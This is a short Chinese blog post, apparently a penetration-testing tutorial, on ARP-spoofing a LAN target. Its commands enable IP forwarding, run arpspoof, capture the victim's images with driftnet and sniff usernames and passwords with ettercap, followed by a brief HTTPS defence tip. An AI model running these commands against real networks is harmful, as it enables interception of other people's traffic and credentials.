关于渗透测试 arpspoof 欺骗抓包
作者:欧阳 发布时间:2020年09月06日 阅读: 2,748 分类:Linux摘要
首先开启测试终端转发功能,如未开启将会断网1为开启,0为关闭转发功能。
echo 1 > /proc/sys/net/ipv4/ip_forward
执行arpspoof命令
sudo arpspoof -t 192.168.50.138 192.168.50.156 -i eth0 //138为渗透对象,156为测试终端,i为指定网卡
获取渗透对象图片
sudo driftnet -i eth0 -d /home/kali/pic/ //i为指定网卡名称,-d为获取到图片保存地址
获取账号密码
sudo ettercap -Tq -i eth0 //开启后显示获取username与password的字段数据包
关于防范该问题的方法:上SSL证书,开启https即可解决。所以在http协议下切勿输入你重要的密码。
如果您还有什么疑惑或建议,欢迎在下方评论区继续讨论。
如果您觉得本文还不错,欢迎分享/打赏本文。当然,如果你无视它,也不会影响你的阅读。再次表示欢迎和感谢!